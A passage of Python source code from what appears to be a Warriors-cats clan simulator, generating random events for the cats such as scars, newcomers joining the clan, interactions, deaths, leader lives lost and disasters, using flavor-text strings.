orders')\n else:\n scar_text.extend([\n f'While following orders {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders, {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object'\n ])\n\n elif chance == 1 and other_cat.status == 'leader' and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic',\n 'controlling', 'fierce', 'petty'\n ]:\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders, {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object',\n f'{name} is injured while fighting a clanmate encouraged by '\n + other_name, f'{name} is injured by ' + other_name +\n ' for disobeying orders', f'{name} is injured by ' +\n other_name + ' for speaking out against them',\n f'{name} is cruelly injured by ' + other_name +\n ' to make an example out of them'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object',\n f'{name} is injured while fighting a clanmate encouraged by '\n + other_name, f'{name} is injured by ' + other_name +\n ' for disobeying orders', f'{name} is injured by ' +\n other_name + ' for speaking out against them',\n f'{name} is cruelly injured by ' + other_name +\n ' to make an example out of them'\n ])\n\n if scar_text:\n game.cur_events_list.append(choice(scar_text))\n\n def invite_new_cats(self, cat):\n chance = 100\n if self.living_cats < 10:\n chance = 100\n elif self.living_cats > 50:\n chance = 700\n elif self.living_cats > 30:\n chance = 300\n if randint(1, chance\n ) == 1 and cat.age != 'kitten' and cat.age != 'adolescent':\n self.new_cat_invited = True\n name = str(cat.name)\n type_of_new_cat = choice([1, 2, 3, 4, 5, 6, 7])\n if type_of_new_cat == 1:\n kit = Cat(moons=0)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, kit))\n relationships.append(Relationship(kit, the_cat))\n kit.relationships = relationships\n game.clan.add_cat(kit)\n kit_text = [\n f'{name} finds an abandoned kit and names them {str(kit.name)}',\n f'A loner brings their kit named {str(kit.name.prefix)} to the clan, stating they no longer can care for them'\n ]\n game.cur_events_list.append(choice(kit_text))\n self.check_age(kit)\n\n elif type_of_new_cat == 2:\n self._extracted_from_invite_new_cats_19(name)\n\n elif type_of_new_cat == 3:\n loner = Cat(status='warrior', moons=randint(12, 120))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n loner.skill = 'formerly a loner'\n game.clan.add_cat(loner)\n loner_text = [\n f'{name} finds a loner who joins the clan',\n f'A loner says that they are interested in clan life and joins the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n 'The loner changes their name to ' + str(loner.name))\n self.check_age(loner)\n\n elif type_of_new_cat == 4:\n warrior = Cat(status='warrior', moons=randint(12, 150))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(\n the_cat, warrior))\n relationships.append(Relationship(warrior, the_cat))\n warrior.relationships = relationships\n game.clan.add_cat(warrior)\n warrior_text = []\n if len(game.clan.all_clans) > 0:\n warrior_text.extend([\n f'{name} finds a warrior from {str(choice(game.clan.all_clans).name)}Clan named {str(warrior.name)} who asks to join the clan',\n f'An injured warrior from {str(choice(game.clan.all_clans).name)}Clan asks to join in exchange for healing'\n ])\n else:\n warrior_text.extend([\n f'{name} finds a warrior from a different clan named {str(warrior.name)} who asks to join the clan'\n ])\n game.cur_events_list.append(choice(warrior_text))\n self.check_age(warrior)\n\n elif type_of_new_cat == 5:\n self._extracted_from_invite_new_cats_47(name)\n elif type_of_new_cat == 6:\n loner = Cat(status='warrior', moons=randint(12, 120))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n self._extracted_from_invite_new_cats_59(loner)\n loner_text = [\n f'{name} finds a kittypet named {choice(names.loner_names)} who wants to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n 'The kittypet changes their name to ' + str(loner.name))\n self.check_age(loner)\n\n elif type_of_new_cat == 7:\n parent1 = cat.name\n kits = choice([1, 1, 2, 2, 2, 3])\n for kit in range(kits):\n if cat.mate is not None:\n kit = Cat(parent1=cat.ID, parent2=cat.mate, moons=0)\n game.clan.add_cat(kit)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n if the_cat.ID in [kit.parent1, kit.parent2]:\n the_cat.relationships.append(\n Relationship(the_cat, kit, False, True))\n relationships.append(\n Relationship(kit, the_cat, False, True))\n else:\n the_cat.relationships.append(\n Relationship(the_cat, kit))\n relationships.append(Relationship(\n kit, the_cat))\n kit.relationships = relationships\n else:\n kit = Cat(parent1=cat.ID, moons=0)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n if the_cat.ID == kit.parent1:\n the_cat.relationships.append(\n Relationship(the_cat, kit, False, True))\n relationships.append(\n Relationship(kit, the_cat, False, True))\n else:\n the_cat.relationships.append(\n Relationship(the_cat, kit))\n relationships.append(Relationship(\n kit, the_cat))\n kit.relationships = relationships\n game.clan.add_cat(kit)\n if len(game.clan.all_clans) > 0:\n Akit_text = ([\n f'{parent1} finds an abandoned litter and decides to adopt them',\n f'A loner leaves their litter to the clan. {str(parent1)} decides to adopt them as their own',\n f'A {str(choice(game.clan.all_clans).name)}Clan queen decides to leave their litter with you. {str(parent1)} takes them as their own'\n ])\n else:\n Akit_text = ([\n f'{parent1} finds an abandoned litter and decides to adopt them as their own',\n f'A loner leaves their litter to the clan. {str(parent1)} decides to adopt them as their own'\n ])\n game.cur_events_list.append(choice(Akit_text))\n self.check_age(kit)\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_59(self, loner):\n loner.skill = 'formerly a kittypet'\n if choice([1, 2]) == 1:\n loner.specialty2 = choice(scars3)\n game.clan.add_cat(loner)\n self.check_age(loner)\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_47(self, name):\n loner_name = choice(names.loner_names)\n loner = Cat(prefix=loner_name,\n gender=choice(['female', 'male']),\n status='warrior',\n moons=randint(12, 120),\n suffix='')\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n self._extracted_from_invite_new_cats_59(loner)\n loner_text = [\n f'{name} finds a kittypet named {str(loner_name)} who wants to join the clan',\n f'A kittypet named {str(loner_name)} stops {name} and asks to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n str(loner_name) + ' decides to keep their name')\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_19(self, name):\n loner_name = choice(names.loner_names)\n loner = Cat(prefix=loner_name,\n gender=choice(['female', 'male']),\n status='warrior',\n moons=randint(12, 120),\n suffix='')\n loner.skill = 'formerly a loner'\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n game.clan.add_cat(loner)\n loner_text = [\n f'{name} finds a loner named {str(loner.name)} who joins the clan',\n f'A loner named {str(loner.name)} waits on the border for a patrol, asking to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n str(loner_name) + ' decides to keep their name')\n self.check_age(loner)\n\n def other_interactions(self, cat):\n if randint(1, 100) != 1:\n return\n interactions = []\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n name = str(cat.name)\n other_name = str(other_cat.name)\n if cat.status in ['warrior', 'deputy'] and randint(\n 1, 15) == 1 and game.settings.get('retirement') is True:\n game.cur_events_list.append(\n f'{name} retires to the elders den after injuries sustained defending {other_name}'\n )\n if cat.status == 'deputy':\n game.clan.deputy = None\n\n cat.status_change('elder')\n return\n if cat.status == 'kitten' and other_cat.status != 'kitten':\n interactions.extend([\n f'{name} is scolded after sneaking out of camp',\n f'{name} falls into a river but is saved by {other_name}'\n ])\n elif cat.status in ['apprentice', 'medicine cat apprentice'] and other_cat.status != 'kitten':\n interactions.extend([\n f'{name} is scolded after sneaking out of camp',\n f'{name} falls into a river but is saved by {other_name}',\n name +\n \" accidentally trespasses onto another clan\\'s territory\"\n ])\n if other_cat.status == 'apprentice':\n interactions.append(\n f'{name} sneaks out of camp with {other_name}')\n elif cat.status == 'warrior':\n interactions.extend([\n name + \" is caught outside of the Clan\\'s territory\",\n f'{name} is caught breaking the Warrior Code',\n f'{name} went missing for a few days',\n f'{name} believes they are a part of the new prophecy'\n ])\n elif cat.status == 'medicine cat':\n interactions.extend([\n f'{name} learns of a new prophecy',\n f'{name} is worried about an outbreak of greencough',\n f'{name} is worried about how low their herb stores has gotten',\n f'{name} visits the other medicine cats'\n ])\n elif cat.status == 'deputy':\n interactions.extend([\n f'{name} thinks about retiring',\n f'{name} travels to the other clans to bring them an important message'\n ])\n elif cat.status == 'leader':\n if game.clan.leader_lives <= 5:\n interactions.extend([\n f'{name} thinks about retiring',\n name + \" confesses they don\\'t have many lives left\"\n ])\n if other_cat.status not in [\n 'kitten', 'apprentice', 'medicine cat apprentice'\n ]:\n interactions.append(\n f'{name} confesses to {other_name} that the responsibility of leadership is crushing them'\n )\n elif other_cat.status == 'apprentice':\n interactions.append(f'{name} assesses {other_name}' +\n \"\\'s progress\")\n interactions.extend([\n f'{name} calls a clan meeting to give an important announcement'\n ])\n elif cat.status == 'elder':\n interactions.extend(\n [f'{name} is brought back to camp after wandering off'])\n if cat.age == other_cat.age:\n interactions.extend([\n f'{name} tries to convince {other_name} to run away together'\n ])\n\n if interactions:\n game.cur_events_list.append(choice(interactions))\n\n def handle_deaths(self, cat):\n clan_has_kits = any(\n str(cat.status) in \"kitten\"\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n #Leader lost a life EVENTS\n if randint(1, 100) == 1:\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.status == 'leader' or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n if cat.status == 'leader':\n other_name = str(other_cat.name)\n cause_of_death = [\n name + ' lost a life after falling into a river',\n name + ' lost a life due to greencough',\n name + ' lost a life due to whitecough',\n 'Lightning fell in camp and ' + name + ' lost a life',\n name + ' was mortally wounded by a fox', name +\n ' lost a life to a dog', name + ' lost a life to a badger',\n name + ' lost a life to a hawk',\n name + ' lost a life due to yellowcough',\n name + ' lost a life while fighting off a rogue',\n name + ' lost a life to an eagle', name +\n ' was grabbed and dropped by an eagle, losing a life',\n name + ' was grabbed and dropped by a hawk, losing a life',\n name + ' lost a life after being swept away by a flood',\n name + ' lost a life after falling off a tree',\n name + ' was bit by a venomous spider and lost a life',\n name + ' was bit by a venomous snake and lost a life',\n name + ' ate poisoned fresh-kill and lost a life', name +\n ' failed to interpret a warning sign from StarClan and lost a life as a result',\n name + ' lost a life defending ' + other_name +\n ' from a dog', name + ' lost a life defending ' +\n other_name + ' from a badger', name +\n ' lost a life defending ' + other_name + ' from a fox',\n name + ' lost a life defending ' + other_name +\n ' from a hawk', name + ' lost a life defending ' +\n other_name + ' from an eagle',\n name + ' lost a life while saving ' + other_name +\n ' from drowning', name + ' lost a life while saving ' +\n other_name + ' from a monster',\n name + ' was pushed under a monster and lost a life',\n name + ' lost a life after saving ' + other_name + ' from a snake'\n ]\n if len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' lost a life defending the kits from ' +\n choice(game.clan.all_clans).name + 'Clan warriors',\n name + ' lost a life defending ' + other_name +\n ' from ' + choice(game.clan.all_clans).name +\n 'Clan warriors', name + ' lost a life to a ' +\n choice(game.clan.all_clans).name + 'Clan apprentice',\n name + ' lost a life to a ' +\n choice(game.clan.all_clans).name + 'Clan warrior'\n ])\n game.clan.leader_lives -= 1\n self.dies(cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n #Several/All Lives loss\n elif randint(1,200) == 1 and cat.status == 'leader': \n name = str(cat.name)\n allorsome = randint(1, 10)\n if cat.status == 'leader':\n if allorsome == 1:\n cause_of_death = [\n name +\n ' was brutally attacked by a rogue and lost all of their lives',\n name +\n ' was mauled by dogs and lost all of their lives',\n name +\n ' was carried off by an eagle, never to be seen again',\n name +\n ' was carried off by a hawk, never to be seen again',\n name + ' was taken by twolegs, never to be seen again',\n name +\n ' fell into a river and was swept away by the current, never to be seen again',\n name +\n ' was burnt alive while trying to save their clanmates from a fire'\n ]\n if self.at_war and len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' was brutally murdered by a ' +\n choice(game.clan.all_clans).name +\n 'Clan warrior and lost all of their lives',\n name + ' was brutally murdered by the ' +\n choice(game.clan.all_clans).name +\n 'Clan deputy and lost all of their lives',\n name + ' was brutally murdered by the ' +\n choice(game.clan.all_clans).name +\n 'Clan leader and lost all of their lives'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was buried alive in an avalanche',\n name + ' was buried alive by a landslide', name +\n ' was pushed off a cliff with sharp rocks at the bottom',\n name +\n ' accidentally fell off a cliff with sharp rocks at the bottom'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name +\n ' was washed out to sea and was never seen again',\n name +\n ' was lost to sea while saving a clanmate from drowning'\n ])\n if game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name +\n ' fell into a sinkhole and was never seen again',\n name +\n ' fell into a hidden burrow and was buried alive',\n name +\n ' was buried alive when a burrow collapsed on them'\n ])\n game.clan.leader_lives -= 10\n else:\n lostlives = choice([2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 6])\n cause_of_death = [\n name + ' lost ' + str(lostlives) +\n ' lives due to greencough', name + ' lost ' +\n str(lostlives) + ' lives due to whitecough',\n name + ' lost ' + str(lostlives) +\n ' lives due to yellowcough', name + ' lost ' +\n str(lostlives) + ' lives due to an illness',\n name + ' lost ' + str(lostlives) +\n ' lives due to an infection'\n ]\n game.clan.leader_lives = game.clan.leader_lives - lostlives\n self.dies(cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n elif randint(1, 400) == 1:\n name = str(cat.name)\n cause_of_death = [\n name + ' was murdered', name + ' died of greencough',\n 'A tree fell in camp and killed ' + name,\n name + ' was found dead near a fox den',\n name + ' was bitten by a snake and died'\n ]\n if clan_has_kits == True and cat.status != 'kitten':\n cause_of_death.extend([\n name + ' was bitten by a snake while saving a kit and died'\n ])\n if cat.status == 'kitten':\n cause_of_death.extend([\n name + ' fell into a river and drowned',\n name + ' was taken by a hawk',\n name + ' grew weak as the days passed and died',\n name + ' was killed after sneaking out of camp',\n name + ' died after accidentally eating deathberries',\n name +\n ' was killed in their sleep after a snake snuck into camp'\n ])\n if game.clan.current_season == 'Leaf-bare':\n cause_of_death.extend([\n name + ' was found dead in the snow',\n name + ' froze to death in a harsh snowstorm', name +\n ' disappeared from the nursery and was found dead in the territory',\n name +\n ' was playing on the ice when the ice cracked and they drowned'\n ])\n if game.clan.current_season == 'Greenleaf':\n cause_of_death.extend([name + ' died to overheating'])\n elif cat.status == 'apprentice':\n cause_of_death.extend([\n name + ' died in a training accident', name +\n ' was killed by enemy warriors after accidentally wandering over the border',\n name + ' went missing and was found dead',\n name + ' died in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was crushed to death by an avalanche',\n name + ' fell from a cliff and died'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and drowned',\n name + ' was poisoned by a sea creature and died'\n ])\n elif cat.status == 'warrior' or cat.status == 'deputy':\n if len(game.clan.all_clans) > 0:\n cause_of_death.append(name + ' was found dead near the ' +\n choice(game.clan.all_clans).name +\n 'Clan border')\n cause_of_death.extend([\n name + ' died from infected wounds',\n name + ' went missing and was found dead'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors', name + ' was killed by enemy ' +\n self.enemy_clan + ' warriors',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors', name + ' died in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was crushed by an avalanche',\n name + ' fell from a cliff and died'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and drowned',\n name + ' was poisoned by a sea creature and died'\n ])\n if game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name + ' fell into a sinkhole and died', name +\n ' fell into a hidden burrow and could not get out',\n name +\n ' was buried alive when a burrow collapsed on them'\n ])\n #Leader loses a life\n elif cat.status == 'leader':\n cause_of_death = []\n if len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' lost a live to greencough',\n 'A tree fell in camp and ' + name + ' lost a life'\n ])\n cause_of_death.extend([\n name + ' was found dead near the ' +\n choice(game.clan.all_clans).name +\n 'Clan border mortally injured'\n ])\n cause_of_death.extend([\n name + ' lost a life from infected wounds', name +\n ' went missing and was later found mortally wounded'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' lost a life in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' lost a life in an avalanche',\n name + ' lost a life in a landslide',\n name + ' was pushed off a cliff and lost a life',\n name + ' accidentally fell off a cliff and lost a life'\n ])\n elif game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and lost a life', name +\n ' was poisoned by a sea creature and lost a life'\n ])\n elif game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name + ' fell into a sinkhole and lost a life',\n name + ' fell into a hidden burrow and lost a life',\n name + ' lost a life when a burrow collapsed on them'\n ])\n elif self.at_war:\n cause_of_death.extend([\n name + ' was killed by the ' + self.enemy_clan +\n ' deputy and lost a life',\n name + ' was killed by the ' + self.enemy_clan +\n ' leader and lost a life'\n ])\n\n elif cat.status == 'medicine cat' or cat.status == 'medicine cat apprentice':\n cause_of_death.extend([\n 'The herb stores were damaged and ' + name +\n ' was murdered by an enemy warrior'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by a ' + self.enemy_clan +\n ' warrior while pulling an injured cat out of the battlefield'\n ])\n if cat.status == 'deputy':\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by the ' + self.enemy_clan +\n ' deputy', name + ' was killed by the ' +\n self.enemy_clan + ' leader'\n ])\n\n if cat.status == 'leader':\n game.clan.leader_lives -= 1\n self.dies(cat)\n\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n elif randint(1, 500) == 1: # multiple deaths\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n cause_of_death = [\n name + ' and ' + other_name + ' die of greencough',\n name + ' and ' + other_name + ' die of yellowcough',\n name + ' and ' + other_name + ' die of whitecough',\n name + ' and ' + other_name + ' die from eating poisoned prey'\n ]\n if cat.status == ['kitten', 'leader'] or other_cat.status == ['kitten', 'leader']:\n cause_of_death.extend([\n name + ' and ' + other_name +\n ' are killed in a border skirmish',\n name + ' and ' + other_name +\n ' are killed in a battle against a gang of rogues'\n ])\n if cat.mate is not None and cat.age == other_cat.age and other_cat.mate is None:\n if cat.status == 'leader':\n game.clan.leader_lives -= 10\n game.cur_events_list.append(\n name + ' is killed by ' + other_name +\n ' in an argument over ' +\n str(cat_class.all_cats.get(cat.mate).name))\n self.dies(cat)\n return\n if cat.status == 'leader' or other_cat.status == 'leader':\n game.clan.leader_lives -= 1\n game.cur_events_list.append(choice(cause_of_death) + ' and the leader lost a life')\n else:\n game.cur_events_list.append(choice(cause_of_death))\n self.dies(cat)\n self.dies(other_cat)\n\n elif randint(1, 80) == 1: #Death with Personalities\n murder_chance = 20\n name = str(cat.name)\n countdown = int(len(cat_class.all_cats) / 3)\n other_cat = choice(list(cat_class.all_cats.values()))\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n if cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sneaky',\n 'sadistic', 'greedy', 'selfish'\n ] and other_cat.status in ['leader', 'deputy']:\n if cat.status == 'deputy' and other_cat.status == 'leader':\n if randint(1, murder_chance - 15) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name +\n ' in cold blood to take their place',\n name + ' murdered ' + other_name +\n ' to take their place and made it look like an accident'\n ]\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.status == 'warrior':\n if randint(1, murder_chance - 15) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name +\n ' in cold blood '\n 'in hopes of taking their place',\n name + ' murdered ' + other_name +\n ' in cold blood and made it look accidental '\n 'in hopes of taking their place'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.trait in ['bloodthirsty', 'vengeful', 'sadistic']:\n if randint(1, murder_chance) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name + ' in cold blood',\n name + ' murdered ' + other_name +\n ' in cold blood and made it look accidental'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.status in [\n 'medicine cat', 'medicine cat apprentice'\n ] and cat.trait in ['bloodthirsty', 'vengeful', 'sadistic']:\n if randint(1, murder_chance) == 1:\n cause_of_death = [\n name + ' killed ' + other_name +\n ' by giving them deathberries', name + ' killed ' +\n other_name + ' by giving them foxglove seeds',\n name + ' killed ' + other_name +\n ' by giving them nightshade berries',\n name + ' killed ' + other_name +\n ' by giving them water hemlock',\n name + ' killed ' + other_name +\n ' by consciously giving them the wrong herbs'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n\n elif cat.moons > randint(150, 200): # extra chance of cat dying to age\n if choice([1, 2, 3, 4, 5, 6]) == 1:\n if cat.status != 'leader':\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) +\n ' has passed due to their old age at ' +\n str(cat.moons) + ' moons old')\n else:\n game.clan.leader_lives -= 1\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) +\n ' has lost a life due to their old age at ' +\n str(cat.moons) + ' moons old')\n if cat.status == 'leader' and cat.moons > 269:\n game.clan.leader_lives -= 10\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) + ' has passed due to their old age at ' +\n str(cat.moons) + ' moons old')\n\n if game.settings.get('disasters') is True:\n alive_count = 0\n alive_cats = []\n for cat in list(cat_class.all_cats.values()):\n if not cat.dead and not cat.exiled and cat.status != 'leader':\n alive_count += 1\n alive_cats.append(cat)\n if alive_count > 10:\n chance = int(alive_count / 10)\n if randint(chance, 1000) == 999:\n disaster = []\n dead_cats = random.sample(alive_cats, 5)\n name1 = str(dead_cats[0].name)\n name2 = str(dead_cats[1].name)\n name3 = str(dead_cats[2].name)\n name4 = str(dead_cats[3].name)\n name5 = str(dead_cats[4].name)\n disaster.extend([\n ' drown after the camp becomes flooded',\n ' are killed in a battle against ' +\n choice(names.normal_prefixes) + 'Clan',\n ' are killed after a fire rages through the camp',\n ' are killed in an ambush by a group of rogues',\n ' go missing in the night',\n ' are killed after a badger attack',\n ' die to a greencough outbreak',\n ' are taken away by twolegs',\n ' eat poisoned freshkill and die'\n ])\n if game.clan.current_season == 'Leaf-bare':\n disaster.extend([\n ' die after freezing from a snowstorm',\n ' starve to death when no prey is found'\n ])\n elif game.clan.current_season == 'Greenleaf':\n disaster.extend([\n ' die after overheating',\n ' die after the water dries up from drought'\n ])\n\n game.cur_events_list.append(name1 + ', ' + name2 + ', ' +\n name3 + ', ' + name4 +\n ', and ' + name5 +\n choice(disaster))\n for cat in dead_cats:\n self.dies(cat)\n\n def dies(self, cat): # This function is called every time a cat dies\n if cat.status == 'leader' and game.clan.leader_lives > 0:\n return\n elif cat.status == 'leader' and game.clan.leader_lives <= 0:\n cat.dead = True\n game.clan.leader_lives = 0\n else:\n cat.dead = True\n\n if cat.mate != None:\n cat.mate = None\n if type(cat.mate) == str:\n mate = cat_class.all_cats.get(cat.mate)\n mate.mate = None\n elif type(cat.mate) == Cat:\n cat.mate.mate = None\n\n for app in cat.apprentice.copy():\n app.update_mentor()\n cat.update_mentor()\n game.clan.add_to_starclan(cat)\n\n def check_age(self, cat):\n if 0 <= cat.moons <= 5:\n cat.age = 'kitten'\n elif 6 <= cat.moons <= 11:\n cat.age = 'adolescent'\n elif 12 <= cat.moons <= 47:\n cat.age = 'young adult'\n elif 48 <= cat.moons <= 95:\n cat.age = 'adult'\n elif 96 <= cat.moons <= 119:\n cat.age = 'senior adult'\n else:\n cat.age = 'elder'\n\nevents_class = 